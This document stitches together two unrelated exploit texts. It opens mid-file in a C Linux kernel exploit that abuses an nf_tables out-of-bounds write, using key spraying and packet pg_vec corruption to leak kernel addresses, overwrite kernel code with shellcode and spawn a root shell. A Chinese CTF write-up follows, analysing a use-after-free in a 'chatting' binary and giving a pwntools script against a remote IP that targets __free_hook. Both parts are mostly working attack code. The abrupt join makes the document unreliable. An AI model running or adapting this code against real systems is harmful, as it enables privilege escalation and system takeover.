    end_msg->nlmsg_flags = NLM_F_REQUEST;
    end_msg->nlmsg_pid = getpid();
    end_msg->nlmsg_type = NFNL_MSG_BATCH_END;
    end_msg->nlmsg_len = total_len;

    return end_msg;
}

// set_nested_attr(): Fill in the header of a nested netlink attribute
// @attr: Location where the attribute header is written
// @type: Value stored in nla_type
// @data_len: Size of the nested content, excluding this header
// Returns the address right after the header, i.e. where the first nested
// attribute goes.
struct nlattr *set_nested_attr(struct nlattr *attr, uint16_t type, uint16_t data_len) {
    char *first_child = (char *)attr + sizeof(struct nlattr);

    attr->nla_len = NLA_ALIGN(data_len + sizeof(struct nlattr));
    attr->nla_type = type;

    return (struct nlattr *)first_child;
}

// set_u32_attr(): Write a 32-bit integer netlink attribute
// @attr: Location where the attribute is written
// @type: Value stored in nla_type
// @value: Host-order value; it is stored after conversion with htonl()
// Returns the address U32_NLA_SIZE bytes past @attr (where the next attribute goes).
struct nlattr *set_u32_attr(struct nlattr *attr, uint16_t type, uint32_t value) {
    uint32_t *payload = (uint32_t *)NLA_ATTR(attr);

    attr->nla_len = U32_NLA_SIZE;
    attr->nla_type = type;
    *payload = htonl(value);

    return (struct nlattr *)((char *)attr + U32_NLA_SIZE);
}

// set_u64_attr(): Prepare a 64 bits integer netlink attribute
// @attr: Location where the attribute is written
// @type: Value stored in nla_type
// @value: Host-order value; it is stored after conversion with htobe64()
// Returns the address U64_NLA_SIZE bytes past @attr (where the next attribute goes).
struct nlattr *set_u64_attr(struct nlattr *attr, uint16_t type, uint64_t value) {
    const uint64_t be_value = htobe64(value);

    attr->nla_type = type;
    attr->nla_len = U64_NLA_SIZE;

    // The payload starts NLA_HDRLEN bytes after the header, so it is not
    // guaranteed to be 8-byte aligned: copy the bytes instead of storing
    // through a casted uint64_t pointer.
    memcpy(NLA_ATTR(attr), &be_value, sizeof(be_value));

    return (struct nlattr *)((char *)attr + U64_NLA_SIZE);
}

// set_str8_attr(): Write a fixed 8-byte string netlink attribute
// @attr: Location where the attribute is written
// @type: Value stored in nla_type
// @name: Source buffer; exactly 8 bytes are copied from it
// Returns the address S8_NLA_SIZE bytes past @attr (where the next attribute goes).
struct nlattr *set_str8_attr(struct nlattr *attr, uint16_t type, const char name[8]) {
    char *payload = (char *)NLA_ATTR(attr);

    attr->nla_len = S8_NLA_SIZE;
    attr->nla_type = type;
    memcpy(payload, name, 8);

    return (struct nlattr *)((char *)attr + S8_NLA_SIZE);
}

// set_binary_attr(): Write a byte-array netlink attribute
// @attr: Location where the attribute is written
// @type: Value stored in nla_type
// @buffer: Bytes to copy into the attribute payload
// @buffer_size: Number of bytes to copy from @buffer
// Returns the address of the next attribute slot, i.e. @attr advanced by the
// NLA_ALIGN()ed attribute length.
struct nlattr *set_binary_attr(struct nlattr *attr, uint16_t type, uint8_t *buffer, uint64_t buffer_size) {
    const uint64_t unaligned_len = NLA_BIN_SIZE(buffer_size);

    attr->nla_len = unaligned_len;
    attr->nla_type = type;
    memcpy(NLA_ATTR(attr), buffer, buffer_size);

    return (struct nlattr *)((char *)attr + NLA_ALIGN(unaligned_len));
}

// ---------------------------------- nf_tables --------------------------------------
#define KMALLOC64_KEYLEN (64 - 8 - 12 - 16) // Max size - elemsize - sizeof(nft_set_ext)(align) - min datasize

const uint8_t zerobuf[0x40] = {0};

// create_table(): Register a new table for the inet family
// @sock: Netlink socket the batch is sent on
// @name: Table name; exactly 8 bytes are copied from it by set_str8_attr()
//
// Sends BATCH_BEGIN + NFT_MSG_NEWTABLE + BATCH_END with a single sendmsg() call.
// A failing sendmsg() is reported through err_exit() instead of being ignored.
void create_table(int sock, const char *name) {
    struct msghdr msg;
    struct sockaddr_nl dest_snl;
    struct iovec iov[3];
    struct nlmsghdr *nlh_batch_begin;
    struct nlmsghdr *nlh;
    struct nlmsghdr *nlh_batch_end;
    struct nlattr *attr;
    struct nfgenmsg *nfm;
    ssize_t sent;
    int saved_errno;

    // Destination preparation
    memset(&dest_snl, 0, sizeof(dest_snl));
    dest_snl.nl_family = AF_NETLINK;
    memset(&msg, 0, sizeof(msg));

    // 1. Netlink batch_begin message preparation
    nlh_batch_begin = get_batch_begin_nlmsg();

    // 2. Netlink table message preparation
    nlh = (struct nlmsghdr *)malloc(TABLEMSG_SIZE);
    if (!nlh)
        err_exit("malloc");

    memset(nlh, 0, TABLEMSG_SIZE);
    nlh->nlmsg_len = TABLEMSG_SIZE;
    nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWTABLE;
    nlh->nlmsg_pid = getpid();
    nlh->nlmsg_flags = NLM_F_REQUEST;
    nlh->nlmsg_seq = 0;

    nfm = NLMSG_DATA(nlh);
    nfm->nfgen_family = NFPROTO_INET;

    // Prepare associated attribute (placed right after the nfgenmsg header)
    attr = (struct nlattr *)((char *)nlh + NLMSG_SPACE(sizeof(struct nfgenmsg)));
    set_str8_attr(attr, NFTA_TABLE_NAME, name);

    // 3. Netlink batch_end message preparation
    nlh_batch_end = get_batch_end_nlmsg();

    // IOV preparation
    memset(iov, 0, sizeof(struct iovec) * 3);
    iov[0].iov_base = (void *)nlh_batch_begin;
    iov[0].iov_len = nlh_batch_begin->nlmsg_len;
    iov[1].iov_base = (void *)nlh;
    iov[1].iov_len = nlh->nlmsg_len;
    iov[2].iov_base = (void *)nlh_batch_end;
    iov[2].iov_len = nlh_batch_end->nlmsg_len;

    // Message header preparation
    msg.msg_name = (void *)&dest_snl;
    msg.msg_namelen = sizeof(struct sockaddr_nl);
    msg.msg_iov = iov;
    msg.msg_iovlen = 3;

    sent = sendmsg(sock, &msg, 0);
    saved_errno = errno; // free() below may overwrite errno

    // Free used structures
    free(nlh_batch_end);
    free(nlh);
    free(nlh_batch_begin);

    if (sent < 0) {
        errno = saved_errno;
        err_exit("sendmsg");
    }
}

/* create_set(): Create a netfilter set
* @sock: Socket used to communicate through the netfilter netlink
* @set_name: Name of the created set (exactly 8 bytes are copied from it)
* @set_keylen: Length of the keys of this set
* @data_len: Length of the data stored with each element
* @table_name: Name of the table that stores this set (exactly 8 bytes are copied from it)
* @id: ID of the created set
*
* Sends BATCH_BEGIN + NFT_MSG_NEWSET + BATCH_END with a single sendmsg() call.
* A failing sendmsg() is reported through err_exit() instead of being ignored. */
void create_set(int sock, const char *set_name, uint32_t set_keylen, uint32_t data_len, const char *table_name, uint32_t id) {
    struct msghdr msg;
    struct sockaddr_nl dest_snl;
    struct nlmsghdr *nlh_batch_begin;
    struct nlmsghdr *nlh_payload;
    struct nlmsghdr *nlh_batch_end;
    struct nfgenmsg *nfm;
    struct nlattr *attr;
    uint64_t nlh_payload_size;
    struct iovec iov[3];
    ssize_t sent;
    int saved_errno;

    // Prepare the netlink sockaddr for msg
    memset(&dest_snl, 0, sizeof(struct sockaddr_nl));
    dest_snl.nl_family = AF_NETLINK;

    // 1. First netlink message: batch_begin
    nlh_batch_begin = get_batch_begin_nlmsg();

    // 2. Second netlink message: set attributes
    nlh_payload_size = sizeof(struct nfgenmsg); // Mandatory
    nlh_payload_size += S8_NLA_SIZE;            // NFTA_SET_TABLE
    nlh_payload_size += S8_NLA_SIZE;            // NFTA_SET_NAME
    nlh_payload_size += U32_NLA_SIZE;           // NFTA_SET_ID
    nlh_payload_size += U32_NLA_SIZE;           // NFTA_SET_KEY_LEN
    nlh_payload_size += U32_NLA_SIZE;           // NFTA_SET_FLAGS
    nlh_payload_size += U32_NLA_SIZE;           // NFTA_SET_DATA_TYPE
    nlh_payload_size += U32_NLA_SIZE;           // NFTA_SET_DATA_LEN
    nlh_payload_size = NLMSG_SPACE(nlh_payload_size);

    // Allocation
    nlh_payload = (struct nlmsghdr *)malloc(nlh_payload_size);
    if (!nlh_payload)
        err_exit("malloc");

    memset(nlh_payload, 0, nlh_payload_size);

    // Fill the required fields
    nlh_payload->nlmsg_len = nlh_payload_size;
    nlh_payload->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSET;
    nlh_payload->nlmsg_pid = getpid();
    nlh_payload->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE;
    nlh_payload->nlmsg_seq = 0;

    // Setup the nfgenmsg
    nfm = (struct nfgenmsg *)NLMSG_DATA(nlh_payload);
    nfm->nfgen_family = NFPROTO_INET;

    // Setup the attributes, in the same order as the size computation above
    attr = (struct nlattr *)((char *)nlh_payload + NLMSG_SPACE(sizeof(struct nfgenmsg)));
    attr = set_str8_attr(attr, NFTA_SET_TABLE, table_name);
    attr = set_str8_attr(attr, NFTA_SET_NAME, set_name);
    attr = set_u32_attr(attr, NFTA_SET_ID, id);
    attr = set_u32_attr(attr, NFTA_SET_KEY_LEN, set_keylen);
    attr = set_u32_attr(attr, NFTA_SET_FLAGS, NFT_SET_MAP);
    attr = set_u32_attr(attr, NFTA_SET_DATA_TYPE, 0);
    set_u32_attr(attr, NFTA_SET_DATA_LEN, data_len);

    // 3. Last netlink message: batch_end
    nlh_batch_end = get_batch_end_nlmsg();

    // Setup the iovec
    memset(iov, 0, sizeof(struct iovec) * 3);
    iov[0].iov_base = (void *)nlh_batch_begin;
    iov[0].iov_len = nlh_batch_begin->nlmsg_len;
    iov[1].iov_base = (void *)nlh_payload;
    iov[1].iov_len = nlh_payload->nlmsg_len;
    iov[2].iov_base = (void *)nlh_batch_end;
    iov[2].iov_len = nlh_batch_end->nlmsg_len;

    // 4. Prepare the message to send
    memset(&msg, 0, sizeof(struct msghdr));
    msg.msg_name = (void *)&dest_snl;
    msg.msg_namelen = sizeof(struct sockaddr_nl);
    msg.msg_iov = iov;
    msg.msg_iovlen = 3;

    // Send message
    sent = sendmsg(sock, &msg, 0);
    saved_errno = errno; // free() below may overwrite errno

    // Free allocated memory
    free(nlh_batch_end);
    free(nlh_payload);
    free(nlh_batch_begin);

    if (sent < 0) {
        errno = saved_errno;
        err_exit("sendmsg");
    }
}

/* add_elem_to_set(): Trigger OOB
* @sock: Socket used to communicate throught the netfilter netlink
* @set_name: Name of the set to add the element
* @set_keylen: Length of the keys of the previous set
* @table_name: Table associated to the preiv
* @id: ID of the previous set
* @data_len: Length of the data to copy. (= Size of the overflow - 16 )
* @data: Data used for the overflow
*
* Submit two elements to add to the set.
* The first one is used to setup the data payload
* The second will trigger the overflow */
void add_elem_to_set(int sock, const char *set_name, uint32_t set_keylen, const char *table_name, uint32_t id, uint32_t data_len, uint8_t *data) {
struct msghdr msg;
struct sockaddr_nl dest_snl;
struct nlmsghdr *nlh_batch_begin;
struct nlmsghdr *nlh_payload;
struct nlmsghdr *nlh_batch_end;
struct nfgenmsg *nfm;
struct nlattr *attr;
uint64_t nlh_payload_size;
uint64_t nested_attr_size;
size_t first_element_size;
size_t second_element_size;
struct iovec iov[3];

// Prepare the netlink sockaddr for msg
memset(&dest_snl, 0, sizeof(struct sockaddr_nl));
dest_snl.nl_family = AF_NETLINK;

// 1. First netlink message: batch
nlh_batch_begin = get_batch_begin_nlmsg();

// 2. Second netlink message : Set attributes
// Precompute the size of the nested field
nested_attr_size = 0;

// First element
nested_attr_size += sizeof(struct nlattr); // Englobing attribute
nested_attr_size += sizeof(struct nlattr); // NFTA_SET_ELEM_KEY
nested_attr_size += NLA_BIN_SIZE(set_keylen); // NFTA_DATA_VALUE
nested_attr_size += sizeof(struct nlattr); // NFTA_SET_ELEM_DATA
nested_attr_size += NLA_ALIGN(NLA_BIN_SIZE(data_len)); // NFTA_DATA_VALUE
first_element_size = nested_attr_size;

// Second element
nested_attr_size += sizeof(struct nlattr); // Englobing attribute
nested_attr_size += sizeof(struct nlattr); // NFTA_SET_ELEM_KEY
nested_attr_size += NLA_BIN_SIZE(set_keylen); // NFTA_DATA_VALUE
nested_attr_size += sizeof(struct nlattr); // NFTA_SET_ELEM_DATA
nested_attr_size += sizeof(struct nlattr); // NFTA_DATA_VERDICT
nested_attr_size += U32_NLA_SIZE; // NFTA_VERDICT_CODE
second_element_size = nested_attr_size - first_element_size;

nlh_payload_size = sizeof(struct nfgenmsg); // Mandatory
nlh_payload_size += sizeof(struct nlattr); // NFTA_SET_ELEM_LIST_ELEMENTS
nlh_payload_size += nested_attr_size; // All the stuff described above
nlh_payload_size += S8_NLA_SIZE; // NFTA_SET_ELEM_LIST_TABLE
nlh_payload_size += S8_NLA_SIZE; // NFTA_SET_ELEM_LIST_SET
nlh_payload_size += U32_NLA_SIZE; // NFTA_SET_ELEM_LIST_SET_ID
nlh_payload_size = NLMSG_SPACE(nlh_payload_size);

// Allocation
nlh_payload = (struct nlmsghdr *)malloc(nlh_payload_size);
if (!nlh_payload)
err_exit("malloc");
memset(nlh_payload, 0, nlh_payload_size);

// Fill the required fields
nlh_payload->nlmsg_len = nlh_payload_size;
nlh_payload->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSETELEM;
nlh_payload->nlmsg_pid = getpid();
nlh_payload->nlmsg_flags = NLM_F_REQUEST;
nlh_payload->nlmsg_seq = 0;

// Setup the nfgenmsg
nfm = (struct nfgenmsg *)NLMSG_DATA(nlh_payload);
nfm->nfgen_family = NFPROTO_INET;

// Setup the attributes
attr = (struct nlattr *)((void *)nlh_payload + NLMSG_SPACE(sizeof(struct nfgenmsg)));
attr = set_str8_attr(attr, NFTA_SET_ELEM_LIST_TABLE, table_name);
attr = set_str8_attr(attr, NFTA_SET_ELEM_LIST_SET, set_name);
attr = set_u32_attr(attr, NFTA_SET_ELEM_LIST_SET_ID, id);
attr = set_nested_attr(attr, NFTA_SET_ELEM_LIST_ELEMENTS, nested_attr_size);

// 2-1 First element
attr = set_nested_attr(attr, 0, first_element_size - 4);
attr = set_nested_attr(attr, NFTA_SET_ELEM_KEY, NLA_BIN_SIZE(set_keylen));
attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)zerobuf, set_keylen);
attr = set_nested_attr(attr, NFTA_SET_ELEM_DATA, NLA_BIN_SIZE(data_len));
attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)data, data_len);

// 2-2 Second element
attr = set_nested_attr(attr, 0, second_element_size - 4);
attr = set_nested_attr(attr, NFTA_SET_ELEM_KEY, NLA_BIN_SIZE(set_keylen));
attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)zerobuf, set_keylen);
attr = set_nested_attr(attr, NFTA_SET_ELEM_DATA, U32_NLA_SIZE + sizeof(struct nlattr));
attr = set_nested_attr(attr, NFTA_DATA_VERDICT, U32_NLA_SIZE);
set_u32_attr(attr, NFTA_VERDICT_CODE, NFT_CONTINUE);

// 3. Last netlink message: End of batch
nlh_batch_end = get_batch_end_nlmsg();

// Setup the iovec
memset(iov, 0, sizeof(struct iovec) * 3);
iov[0].iov_base = (void *)nlh_batch_begin;
iov[0].iov_len = nlh_batch_begin->nlmsg_len;
iov[1].iov_base = (void *)nlh_payload;
iov[1].iov_len = nlh_payload->nlmsg_len;
iov[2].iov_base = (void *)nlh_batch_end;
iov[2].iov_len = nlh_batch_end->nlmsg_len;

// Prepare the message to send
memset(&msg, 0, sizeof(struct msghdr));
msg.msg_name = (void *)&dest_snl;
msg.msg_namelen = sizeof(struct sockaddr_nl);
msg.msg_iov = iov;
msg.msg_iovlen = 3;

// Send message
sendmsg(sock, &msg, 0);

// Free allocated memory
free(nlh_batch_end);
free(nlh_payload);
free(nlh_batch_begin);
}

// ---------------------------------- util --------------------------------------
#define FILENAME_MAX_LEN 0x80

// write_file(): Write a string into a file
// @filename: Path of an existing file; it is opened with O_RDWR and not created
// @text: NUL-terminated string to write (the terminator itself is not written)
//
// Failures are reported on stderr and the function returns without writing;
// previously a failed open() handed -1 to write() and close().
void write_file(const char *filename, char *text) {
    const size_t len = strlen(text);
    ssize_t written;
    int fd = open(filename, O_RDWR);

    if (fd < 0) {
        perror(filename);
        return;
    }

    written = write(fd, text, len);
    if (written < 0)
        perror(filename);
    else if ((size_t)written != len)
        fprintf(stderr, "%s: short write (%zd of %zu bytes)\n", filename, written, len);

    close(fd);
}

// new_ns(): Move the process into new user, mount and network namespaces and
// map the caller's uid/gid to 0 inside the new user namespace.
// err_exit() is called if either unshare() fails.
void new_ns(void) {
    char map_line[0x100];
    // Read the IDs before unshare(): these are the values written into the maps below
    const uid_t outer_uid = getuid();
    const gid_t outer_gid = getgid();

    if (unshare(CLONE_NEWUSER | CLONE_NEWNS) != 0)
        err_exit("unshare(CLONE_NEWUSER | CLONE_NEWNS)");

    if (unshare(CLONE_NEWNET) != 0)
        err_exit("unshare(CLONE_NEWNET)");

    // setgroups is written before gid_map
    write_file("/proc/self/setgroups", "deny");

    snprintf(map_line, sizeof(map_line), "0 %d 1", outer_uid);
    write_file("/proc/self/uid_map", map_line);

    snprintf(map_line, sizeof(map_line), "0 %d 1", outer_gid);
    write_file("/proc/self/gid_map", map_line);
}

// set_cpu_affinity(): Restrict a process to a single CPU
// @cpu_n: Index of the only CPU left in the affinity mask
// @pid: Process ID handed to sched_setaffinity()
// err_exit() is called if sched_setaffinity() fails.
void set_cpu_affinity(int cpu_n, pid_t pid) {
    cpu_set_t mask;

    // Start from an empty mask and enable just the requested CPU
    CPU_ZERO(&mask);
    CPU_SET(cpu_n, &mask);

    if (sched_setaffinity(pid, sizeof(mask), &mask) >= 0)
        return;

    err_exit("sched_setaffinity");
}

int is_keyring_corrupted(key_serial_t *id_buffer, uint32_t id_buffer_size,
key_serial_t *corrupted_key_id) {
uint8_t buffer[CORRUPT_SIZE] = {0};
int32_t keylen;

for (uint32_t i = 0; i < id_buffer_size; i++) {
if (!id_buffer[i]) {
continue;
}

keylen = key_read(id_buffer[i], buffer, CORRUPT_SIZE);
if (keylen < 0)
err_exit("keyctl: %m");

if (keylen == CORRUPT_SIZE) {
*corrupted_key_id = id_buffer[i];
return 1;
}
}
return 0;
}

void key_revokes(key_serial_t *id_buffer, uint32_t id_buffer_size) {
for (uint32_t i = 0; i < id_buffer_size; i++) {
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}
}

int netfilter_sock = -1;
uint64_t leak_ptr;

void init_netfilter(void) {
struct sockaddr_nl snl;

puts("creating netfilter netlink socket");
if ((netfilter_sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_NETFILTER)) < 0) {
err_exit("can't create netfilter socket: %m");
}

memset(&snl, 0, sizeof(snl));
snl.nl_family = AF_NETLINK;
snl.nl_pid = getpid();
if (bind(netfilter_sock, (struct sockaddr *)&snl, sizeof(snl)) < 0) {
err_exit("bind: %m");
}

puts("register netfilter table");
create_table(netfilter_sock, TABLE_NAME);

puts("creating a netfilter set for the info leak");
create_set(netfilter_sock, LEAK_SET_NAME, KMALLOC64_KEYLEN, sizeof(struct leak_payload), TABLE_NAME, ID);

puts("creating a netfilter set for the write primitive");
create_set(netfilter_sock, SET_NAME, KMALLOC64_KEYLEN, sizeof(struct write_payload), TABLE_NAME, ID + 1);
}

// write_proc_entry(): Write @text into the existing file @path (opened O_WRONLY).
// Failures are reported on stderr and otherwise ignored, so a failed open()
// no longer hands -1 to write() and close().
static void write_proc_entry(const char *path, const char *text) {
    int fd = open(path, O_WRONLY);

    if (fd < 0) {
        perror(path);
        return;
    }

    if (write(fd, text, strlen(text)) < 0)
        perror(path);

    close(fd);
}

// init_namespace(): Move the process into new user, mount and network
// namespaces, then write "deny" to setgroups and map the caller's uid/gid to 0.
// err_exit() is called if either unshare() fails.
void init_namespace(void) {
    char buff[0x100];

    // Read the IDs before unshare(): these are the values written into the maps below
    uid_t uid = getuid();
    gid_t gid = getgid();

    if (unshare(CLONE_NEWUSER | CLONE_NEWNS)) {
        err_exit("unshare(CLONE_NEWUSER | CLONE_NEWNS): %m");
    }

    if (unshare(CLONE_NEWNET)) {
        err_exit("unshare(CLONE_NEWNET): %m");
    }

    // setgroups is written before gid_map, as in the original sequence
    write_proc_entry("/proc/self/setgroups", "deny");

    snprintf(buff, sizeof(buff), "0 %d 1", uid);
    write_proc_entry("/proc/self/uid_map", buff);

    snprintf(buff, sizeof(buff), "0 %d 1", gid);
    write_proc_entry("/proc/self/gid_map", buff);
}

// do_init(): One-time environment setup, run in this order:
// set the CPU affinity mask to CPU 0 (pid argument 0), unshare into new
// namespaces, then open the netfilter netlink socket and create the table and sets.
void do_init(void) {
set_cpu_affinity(0, 0);
init_namespace();
init_netfilter();
}

int do_leak(void) {
key_serial_t id_buffer[SPRAY_KEY_CNT] = {0};
key_serial_t corrupted_key_id = 0;

struct leak_payload leak_payload;
memset(&leak_payload, 0, sizeof(struct leak_payload));
leak_payload.len = CORRUPT_SIZE;

retry:
puts("spraying user_key_payload ...");
spray_keyring(id_buffer, SPRAY_KEY_CNT);

puts("free some key to create holes ...");
for (int i = FREE_HOLE_BEGIN; i < SPRAY_KEY_CNT; i += FREE_HOLE_STEP) {
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}

puts("trigger oob write ...");
add_elem_to_set(netfilter_sock, LEAK_SET_NAME, KMALLOC64_KEYLEN, TABLE_NAME,
ID, sizeof(struct leak_payload), (uint8_t *)&leak_payload);

puts("checking if keyring is corrupted ...");
if (is_keyring_corrupted(id_buffer, SPRAY_KEY_CNT, &corrupted_key_id)) {
printf("found keyring %d is corrupted!\n", corrupted_key_id);
} else {
puts("can't found corrupted keyring, retry ...");
key_revokes(id_buffer, SPRAY_KEY_CNT);
goto retry;
}

puts("free other keyring to set rcu.func in user_key_payload ...");
for (int i = FREE_HOLE_BEGIN; i < SPRAY_KEY_CNT; i++) {
if (id_buffer[i] == corrupted_key_id) {
continue;
}
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}

puts("searching rcu.func ...");
leak_ptr = get_keyring_leak(corrupted_key_id, CORRUPT_SIZE, 0x4141414141414141); // proc_fs_context_ops
if (!leak_ptr) {
puts("leak rcu.func failed");
for (int i = 0; i < SPRAY_KEY_CNT; i++) {
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}
return 1;
}

printf("leak user_free_payload_rcu: 0x%08lx\n", leak_ptr);

return 0;
}

#define KMALLOC64_PAGE_CNT ((32 + 8) / 8)

#define PACKET_FENGSHUI_CNT (0x100)
#define PACKET_SPRAY_CNT (0x100)
#define PACKET_FREE_HOLE_STEP (0x20)

int pagealloc_pad(int count, int size) {
return packet_socket_setup(size, 2048, count, 0, 100);
}

int do_write_primitive(void) {
int packet_fds[PACKET_SPRAY_CNT] = {0};
int fengshui_fds[PACKET_FENGSHUI_CNT] = {0};

struct write_payload payload;
memset(&payload, 0, sizeof(struct write_payload));
payload.pg_vec = (void *)(leak_ptr & ~0xfff);
payload.pg_vec2 = payload.pg_vec + PAGE_SIZE;

puts("use raw_packet to fill kmalloc-64 ...");
for (int i = 0; i < PACKET_FENGSHUI_CNT; i++) {
fengshui_fds[i] = pagealloc_pad(KMALLOC64_PAGE_CNT, 0x1000);
}

puts("spraying pg_vec in kmalloc-64 ...");
memset(packet_fds, 0, sizeof(packet_fds));
for (int i = 0; i < PACKET_SPRAY_CNT; i++) {
packet_fds[i] = pagealloc_pad(KMALLOC64_PAGE_CNT, 0x1000);
}

puts("free some pg_vec to create holes ...");
for (int i = 0; i < PACKET_SPRAY_CNT; i += PACKET_FREE_HOLE_STEP) {
close(packet_fds[i]);
packet_fds[i] = 0;
}

puts("trigger oob write ...");

add_elem_to_set(netfilter_sock, SET_NAME, KMALLOC64_KEYLEN, TABLE_NAME,
ID, sizeof(struct write_payload), (uint8_t *)&payload);

puts("searching edited page ...");
for (int i = 0; i < PACKET_SPRAY_CNT; i++) {
if (!packet_fds[i]) {
continue;
}
// packet mmap to userland
char *page = (char *)mmap(NULL, PAGE_SIZE * KMALLOC64_PAGE_CNT,
PROT_READ | PROT_WRITE, MAP_SHARED, packet_fds[i], 0);
if (!page || (ssize_t)page < 0) {
printf("mmap error: %p", page);
continue;
}
// search non-empty page
int j;
for (j = 0x30; j < 0x1000; j++) {
if (page[j] != 0) {
break;
}
}

// found non-empty page
if (j != 0x1000) {
puts("found target page!!");
uint64_t *pos = (uint64_t *)&page[leak_ptr & 0xfff];
uint8_t backup[sizeof(shellcode)] = {0};

puts("write shellcode");

memcpy(backup, pos, sizeof(backup));
memcpy(pos, shellcode, sizeof(shellcode));

// trigger rcu, trigger shellcode
key_serial_t fd = key_alloc("shellcode_trigger", "AAAA",4);
key_revoke(fd);
key_alloc("shellcode_trigger", "AAAA",4);

memcpy(pos, backup, sizeof(backup));
return 0;
}
}

puts("can't found target page");

for (int i = 0; i < PACKET_FENGSHUI_CNT; i++) {
close(fengshui_fds[i]);
}
for (int i = 0; i < PACKET_SPRAY_CNT; i++) {
close(packet_fds[i]);
}

return 1;
}

int main(int argc, char **argv) {
puts("initialize exploit environment ...");
do_init();

while (do_leak()) {
usleep(100 * 1000);
puts("retry ...");
}

kernel_offset = leak_ptr - 0xffffffff81532fb0;
kernel_base = 0xffffffff81000000 + kernel_offset;
printf("kernel_base: 0x%lx\n", kernel_base);
printf("kernel_offset: 0x%lx\n", kernel_offset);

while (do_write_primitive()) {
usleep(100 * 1000);
puts("retry ...");
}

execl("/bin/sh", "sh", NULL);
}

chatting

1
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.6) stable release version 2.27.
1
2
3
4
5
6
chatting: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=182890e62a6cb54b4f2f7c6b809f6c43cbb4929a, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

漏洞分析

下面这段代码有逻辑错误:

1
2
3
4
5
6
7
8
9
10
11
12
13
while ( 1 )
{
v7 = (_QWORD *)sub_406A((__int64)&messageg, name);
if ( sub_4838(v7) <= 0x64 )
break;
v4 = std::operator<<<std::char_traits<char>>(&std::cout, "HERE?");
std::ostream::operator<<(v4, &std::endl<char,std::char_traits<char>>);
v5 = sub_406A((__int64)&messageg, name);
v6 = sub_406A((__int64)&messageg, name);
v11 = std::numpunct<wchar_t>::do_truename(v6);
sub_48C2(&v12, (__int64)&v11);
sub_48EC(v5, v12);
}
  • 如果检测到 message 的个数超过 0x64 就会将新创建的 message 释放
  • 但这个被释放的 message 还是会被添加到对应的 vector 中

这就造成了 UAF

入侵思路

先利用堆上遗留的地址泄露 heap_base 和 libc_base

根据程序漏洞,理论上我们拥有 double free 的权利,但 c++ 拥有额外的 tcache 检查,几乎不可能 double free

因此我们需要利用 switch 功能占用 UAF 堆块,二次释放后再用 switch 来修改 tcache

测试代码如下:

1
2
3
4
5
6
7
8
9
10
11
for i in range(0x64):
sleep(0.01)
print(str(i))
message("c"*0x10,0x100,"d"*0x100)
message("c"*0x10,0x50,"k"*0x50)

switch("4"*0x50) # 占用UAF chunk
dele("5"*0x50)
dele("c"*0x10)

switch(p64(free_hook)) # 修改UAF chunk

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './chatting1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.27.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"

local = 0
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('101.200.122.251','14509')

def debug():
#gdb.attach(p)
gdb.attach(p,"b *$rebase(0x04797)\nb *$rebase(0x2B83)\nb *$rebase(0x495E)\n")
#pause()

def cmd(op):
sla(":",op)

def add(name):
cmd("add")
sla("username:",name)

def dele(name):
cmd("delete")
sla("delete:",name)

def show():
cmd("listuser")

def switch(to):
cmd("switch")
sla("to:",to)

def message(to,size,data):
cmd("message")
sla("To:",to)
sla("size:",str(size))
sa("Content",data)

def read():
cmd("read")

#debug()

sla("username:","a"*0x10)
add("1"*0x10)
add("3"*0x400)
add("2")
add("4"*0x10)

message("a"*0x10,0x1,"b")

read()
ru(": ")
ru(": ")
leak_addr = u64(p.recv(6).ljust(8,b"\x00"))
libc_base = leak_addr - 0x3ebc62
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

system = libc_base + libc.sym["system"]
free_hook = libc_base + libc.sym["__free_hook"]

dele("4"*0x10)
message("a"*0x10,0x1,"c")
read()
ru(": ")
ru(": ")
ru(": ")
leak_addr = u64(p.recv(6).ljust(8,b"\x00"))
heap_base = leak_addr - 0x1ec63
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

add("c"*0x10)
add("4"*0x50)
add("5"*0x50)
add("6"*0x50)
add(p64(free_hook))

sleep(0.2)
